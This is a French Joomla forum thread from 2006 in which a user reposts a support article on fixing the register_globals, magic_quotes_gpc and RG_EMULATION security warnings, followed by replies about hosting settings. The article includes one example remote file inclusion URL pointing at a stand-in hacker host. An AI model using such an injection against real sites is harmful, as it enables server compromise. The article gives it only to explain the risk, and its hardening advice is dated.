probléme à l'installation de la mise à jour, Comment réagir aux avertissements de séc

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • probléme à l'installation de la mise à jour, Comment réagir aux avertissements de séc

    Bonjour à tous,

    j'ai recréer une discusion sur ce théme là car j'ai trouvé un ensemble de solution trés expliqué sur le site support de joomla. dont voici le lien pour ce qui sont en galére de ce type de problème:

    http://aide.joomla.fr/content/view/34/61/

    Et puis malheur à moi j'ai effectué toutes les manips proposé, mon hébergeur me dit même avoir fait les changements nécessaire, et pourtant j'ai toujours ces avertissement de sécurité:

    Les paramètres PHP Serveur suivants ne sont pas optimum pour la Sécurité de votre site, il vous est recommandé de les modifier:

    PHP magic_quotes_gpc setting is `OFF` instead of `ON`
    Paramètre PHP register_globals est sur `ON` au lieu de `OFF`


    Et pour ne rien arranger à la rédaction d'un article sa rame. Deux minutes d'attente pour pouvoir taper une seul lettre.

    Il y a donc une ******* dans le potage. Quelqu'un peut-il me donner des conseils?

    Bonne journée

    Trevor


    ----------------------------------------------------------------------
    j'ai recréer une discusion sur ce théme là car j'ai trouvé un ensemble de solution trés expliqué sur le site support de joomla. dont voici le lien pour ce qui sont en galére de ce type de problème:

    http://aide.joomla.fr/content/view/34/61/

    Dont voici le contenu:

    Comment réagir aux avertissements de sécurité depuis Joomla 1.0.11
    Base de connaissances - Questions diverses
    Dans Joomla! 1.0.11, nous trouvons trois avertissements de sécurité destinés à renforcer la sécurité de vos sites.
    Ces précisions font suite au précédent article à ce sujet. Voici quelques explications quant à la fonction de ces réglages.



    Register Globals (register_globals=Off)
    Ca fait quoi?
    Cette fonction récupère toutes les valeurs passées au script et les insère dans des variables utilisables par le script. Utile pour les dévelopeurs un peu négligents.
    Cela signifie que l'URL



    index.php?foo=bar

    va créer automatiquement dans le script index.php une variable $foo contenant la valeur "bar".



    Et alors?
    Le problème avec cette fonction, c'est qu'elle n'examine pas la valeur avant de créer la variable pour d'éventuels paramètres nocifs. Si on l'utilise par exemple pour remplacer le chemin utilisé par Joomla! pour l'inclusion de fichiers, on pourra tout simplement faire:



    index.php?mos_config_livesite=http://jevais.tehacker.com

    A partir de là, index.php de votre site essaiera d'inclure ses fichiers depuis le site du hackeur, qui pourra ainsi vous envoyer ce qu'il veut, et pénétrer votre serveur!

    La fonction n'est pas mauvaise ou nocive en elle-même. Si vous vérifiez la valeur de chaque variable avant de l'utiliser, et filtrez les indésirables, elle peut même être utile pour un dévelopement rapide. Le problème, c'est que beaucoup de dévelopeurs d'extensions n'en prennnet pas la peine, et n'utilisent pas non plus la fonction native mosGetParam() qui s'occupe du filtrage. Si tous les dev's utilisaient cette mosGetParam(), il n'y aurait plus de problèmes avec register_globals (le filtrage s'effectuant de manière automatique et transparente!).


    Comment désactiver register_globals?
    Vous avez plusieures possiblités, selon vos accès. La première, au niveau serveur, est la plus sure, il semblerait que si ce réglage n'est pas effectué au niveau serveur, sur un hébergement mutualisé (plusieurs sites sur un même serveur), cela ne serve pas à grand chose!



    Si vous avez accès à la configuration Apache/PHP du serveur lui-même, vous règlez simplement

    register_globals=Off
    dans la configuration.


    Le fichier .htaccess
    Sur la plupart des serveurs, vous pouvez configurer Apache avec ce fichier, qui se trouve à la racine du site. Ces fichiers ne sont pas accessibles via le navigateur / le web. Ils ne peuvent pas être crées sur un PC Windows (cause: extension manquante), on procèdera par FTP sur le serveur directement, en renommant et ou éditant un fichier htaccess.txt déjà inclus lors de l'installation de Joomla!
    Ce fichier devra être édité pour rajouter la ligne

    php_flag register_globals off
    qui désactivera register_globals pour tout votre site et ses sous dossiers.


    php.ini
    Si la méthode du fichier .htaccess ne marche pas ou ne peut être utilisée, vous pouvez essayer d'utiliser un fichier .ini, qui est quasiment identique sauf que le code à utiliser sera:

    register_globals = off
    et que ce fichier doit être copié DANS CHAQUE DOSSIER de votre installation Joomla! (oui, même les sous-dossiers, comme pour les images ou autres!).


    Si aucune de ces recommandations ne marche pour vous, demandez à votre hébergeur de désactiver ce réglage, dont les problèmes sont connus depuis quelques années. S'il refuse, changez d'hébergeur!



    --------------------------------------------------------------------------------

    Magic Quotes (magic_quotes_gpc=On)
    Ce paramètre doit être activé - réglé sur On!


    Ca fait quoi?
    Cette fonction s'assure que toutes les données que vos scripts passent pour sauvegarde à la base de données soient "escaped" d'abord, ce qui empêchera un hack du site à travers des données sauvegardées sans filtrage.



    Comment faire?
    Quasiment la même procédure:


    activer au niveau système (serveur)
    .htaccess (racine du site):

    php_flag magic_quotes_gpc on
    php.ini (à la racine ET dans chaque dossier):

    magic_quotes_gpc = on

    --------------------------------------------------------------------------------

    Emulation RG
    Ca fait quoi?
    C'est une émulation de la fonction register_globals. Cette émulation prévient déjà une bonne partie des risques de sécurité liés à register_globals, tout en assurant la fonctionalité de certaines extensions un peu mal codées se basant sur register_globals. Malheureusement, certaines failles subsistent, et cette fonction est donc également à désactiver.


    Comment faire?
    A la racine de votre site Joomla! se trouve le fichier globals.php qu'il vous faut éditer (soit en copie locale, puis écraser le fichier existant, soit directement en ligne par FTP si votre client (logiciel, tel que Cute FTP) le permet.
    Recherchez la ligne


    define( 'RG_EMULATION', 1 );
    et changez la valeur à 0 (zéro) pour désactiver:


    define( 'RG_EMULATION', 0 );
    Sachez cependant que bon nombre d'extensions ne fonctionneront plus sans mise à jour du code. Vous en trouverez une liste ici .



    Mon site est-il sécurisé maintenant?
    Non, simplement. Il y a plusieures autres méthodes par lesquelles un hackeur peut accéder à votre site. Ces trois réglages colmateront les ttrois failles majeures au niveau serveur. La sécurité ne pourra jamais être totale, mais au moins vous rendrez la tache le plus difficile possible aux hackeurs potentiels.
    Utilisez toujours la dernière mise à jour de Joomla! et de vos extensions, restez informé en vous abonnant aux annonces officielles et consultez régulièrement le forum dédié à la sécurité.

    (d'après un message de Hackwar sur le forum officiel, merci à lui pour ces précisions!)

    Petite lecture sur le fichier .htaccess, merci à Commentçamarche
    Dernière édition par trevor à 06/11/2006, 20h43 Raison: probléme d'installation mise à jour 1.11, réagir aux avertissements sécurité

    HTPP://www.surete-aerienne.eu

  • #2
    Salut a toi l'ami moi je te conseillerais plus de scruter le forum d'y faire des recherches je pense que la solution s'y trouve, je te passe se lien espérant qu'il puissent t'aider.
    ben je vais te faire un peu fouiller quoi !!!!

    http://forum.joomla.fr/search.php?searchid=334641
    Témoignages, Formations, sur la pratique du logiciel libre sur : http://www.aveclelibre.info

    Commentaire


    • #3
      probleme de lenteur

      bonjour,

      mon probléme de lenteur à disparu, en effaçant un article issue d'un copier coller, cette suite de mots devaient pertubé joomla, sans doute un script mais je ne mis connaît pas assez pour dressé le détail du problème.

      bon week-end

      Trevor

      HTPP://www.surete-aerienne.eu

      Commentaire


      • #4
        Bonjour

        Chez moi plus de soucis pour globals.php par contre pour les paramètres de sécurité "PHP register_globals setting " je suis chez 1and1, le .htaccess est dans le dossier logs à la racine, mon site et déjà lancé et j'ai déjà réalisé plusieurs choses.

        Comment modifier le .htaccess de l'hebergeur via le FTP car apparemment je peut bien ajouter une ligne mais par contre je n'arrive pas à l'écraser par le nouveau ???

        Merci de votre aide !

        Commentaire


        • #5
          réglé / DJWEB

          Salut à tous,

          j'ai fini par réglé mon problème n'ont loin d'être doué, c'est que en faîte cela vener apparement de mon hébergeur qui a finit par faire ce qu'il faut pour me mettre les paramétre demandé comme il faut.

          Conclusion:

          Voyez avec votre hébergeur. cela saurat peut-être votre solution.

          Pour Djweb, je suis loin de m'y connaître, mais pour mmooi j'upload le fichier avec mon FTP, puis il me demande si je veux écraser l'ancien en autre, il y a juste une croix à coché et voilà. J'utilise FILEZILA, il est trés bien.

          Trevor

          HTPP://www.surete-aerienne.eu

          Commentaire


          • #6
            Merci Trevor ! Donc en fait j'ai juste à rajouter une ligne dans le fichier d'origine de mon hebergeur et faire en sorte de l'écraser (jusqu'a maintenant cela a échoué... même lorsque je le demande à l'écraser sur filezilla)

            Il n'y aura pas de conflit avec le fichier paramétré par l'hebergeur ??

            Commentaire

            Annonce

            Réduire
            1 sur 2 < >

            C'est [Réglé] et on n'en parle plus ?

            A quoi ça sert ?
            La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

            Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

            Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
            Comment ajouter la mention [Réglé] à votre discussion ?
            1 - Aller sur votre discussion et éditer votre premier message :


            2 - Cliquer sur la liste déroulante Préfixe.

            3 - Choisir le préfixe [Réglé].


            4 - Et voilà… votre discussion est désormais identifiée comme réglée.

            2 sur 2 < >

            Assistance au forum - Outil de publication d'infos de votre site

            Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

            Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

            Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

            UTILISER À VOS PROPRES RISQUES :
            L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

            Problèmes connus :
            FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

            Installation :

            1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

            Archive zip : https://github.com/AFUJ/FPA/zipball/master

            2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

            3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

            4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

            5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

            6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
            et remplacer www. votresite .com par votre nom de domaine


            Exemples:
            Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
            Télécharger le script fpa-fr.php dans: /public_html/
            Pour executer le script: http://www..com/fpa-fr.php

            Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
            Télécharger le script fpa-fr.php dans: /public_html/cms/
            Pour executer le script: http://www..com/cms/fpa-fr.php

            En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

            Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
            Voir plus
            Voir moins
            Travaille ...
            X